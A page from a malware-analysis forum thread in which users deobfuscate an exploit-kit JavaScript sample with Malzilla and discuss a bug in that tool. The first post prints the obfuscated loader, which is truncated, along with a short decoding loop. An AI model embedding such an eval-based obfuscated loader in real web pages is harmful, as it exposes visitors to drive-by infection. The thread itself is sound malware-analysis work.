Malware Related > Malware Analysis

Deobfuscate exploit kits using Malzilla

<< < (4/4)

shellc0de:
Another version:


--- Code: ---<html><body><script>
g='rom';
g=g+'C';
g=g+'harCod';
g=g+'e';
if(window["documen"+"t"])aa=([].unshift+"");
aa=aa.split('').pop();
a='94&105&93&111&103&95&104&110&40&113&108&99&110&95&34&33&54&93&95&104&110&95&108&56&54&98&43&56&74&102&95&91&109&95&26&113&91&99&110&26&106&91&97&95&26&99&109&26&102&105&91&94&99&104&97&40&40&40&54&41&98&43&56&54&41&93&95&104&110&95&108&56&54&98&108&56&33&35&53[....it goes on.....]'.split("&");
md='a';
v=aa;
if(!(("\n"!=v)&&(v!='}'))){w=String;e=window['eval'];}
c='';
i=0;
s=x=a;
while(i!=s['length']){
c=c+w['f'+g](parseInt(s[0+i]) + 7 - 1);
i++;
}
e(c);
</script></body></html>
--- End code ---

Also found a bug in malzilla while messing with the script: http://i.imgur.com/8zbZs.png

NINJA EDIT: This is how far I got at deobfuscating but I'm not familiar enough with js:
--- Code: ---//first I find and replace all "&" with ","
         for(i=0;i<=a.length;i++){
 a[i]=a[i]+6;
 document.write(a[i]);
 document.write(',');
}

--- End code ---
Then I paste the output into the misc decoder and click decimal to ascii.

EDIT2: Hey I figured it out! I see someone else already did too: http://www.virustotal.com/file-scan/report.html?id=19321549c048af5767c3ff1cfcac22e746dfddf8e09300276475834d668e4938-1325719223

MysteryFCM:
Yep, come across that myself a few times, spoke to Bobby about it, but can't remember what he said caused it.

You can find the source code for Malzilla here if you'd like to try and identify the cause yourself;

http://sourceforge.net/projects/malzilla/files/Malzilla%20Win32%20Source%20package/

Not seen Bobby around for over a year or so, so unsure if he's still working on it.

Navigation

[0] Message Index

[*] Previous page